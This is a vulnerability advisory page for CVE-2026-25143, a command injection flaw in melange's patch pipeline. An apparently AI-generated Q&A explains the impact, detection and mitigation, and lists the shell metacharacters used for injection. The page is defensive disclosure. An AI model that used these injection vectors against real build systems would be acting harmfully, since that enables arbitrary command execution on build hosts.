CVE-2026-25143
Command Injection in Melange Patch Pipeline Allows Arbitrary Execution
Publication date: 2026-02-04
Last updated on: 2026-02-18
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| chainguard | melange | From 0.10.0 (inc) to 0.40.5 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-78 | The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-25143 is a high-severity vulnerability in the melange package versions 0.10.0 through before 0.40.5. It occurs in the patch pipeline used during melange build and license-check operations, where input-derived values such as series paths, patch filenames, and numeric parameters are embedded directly into shell scripts without proper quoting or validation.
This improper handling allows shell metacharacters like backticks, command substitutions $(β¦), semicolons, pipes, or redirections to break out of their intended context, enabling an attacker who can influence patch-related inputs to execute arbitrary shell commands on the build host with the privileges of the melange build process.
Exploitation requires local access with low attack complexity and no privileges, but user interaction is necessary. The vulnerability was fixed in version 0.40.5.
How can this vulnerability impact me? :
This vulnerability can have high impacts on confidentiality, integrity, and availability of the affected system.
- Confidentiality: An attacker can execute arbitrary commands, potentially accessing sensitive data on the build host.
- Integrity: Arbitrary command execution can allow modification or corruption of build artifacts or system files.
- Availability: Malicious commands could disrupt build processes or the host system, causing denial of service.
Since the attacker can execute commands with the privileges of the melange build process, the impact can be significant in environments using melange for building apk packages.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by checking if your system is running melange versions from 0.10.0 up to before 0.40.5, as these versions contain the vulnerable patch pipeline.
Since the vulnerability involves shell command injection through patch-related inputs in the patch pipeline, detection involves verifying if untrusted inputs are being passed to melange build or melange license-check operations without proper sanitization.
You can check the installed melange version with the command:
- melange --version
To detect suspicious activity or exploitation attempts, monitor logs or audit commands executed by the melange build process, especially those involving patch filenames or series paths containing shell metacharacters such as backticks (`), semicolons (;), pipes (|), or command substitutions ($()).
There are no specific detection commands provided in the resources, but general best practices include auditing CI pipelines or build-as-a-service environments that invoke melange with patch inputs.
What immediate steps should I take to mitigate this vulnerability?
The immediate and most effective mitigation step is to upgrade melange to version 0.40.5 or later, where this vulnerability has been fixed.
Until the upgrade can be performed, avoid using untrusted or user-controlled inputs in patch-related parameters passed to melange build or melange license-check operations.
Additionally, review and restrict access to CI pipelines, build-as-a-service environments, or melange configurations to prevent attackers from influencing patch inputs.
Implement input validation and sanitization to neutralize shell metacharacters in patch filenames, series paths, and numeric parameters used by the patch pipeline.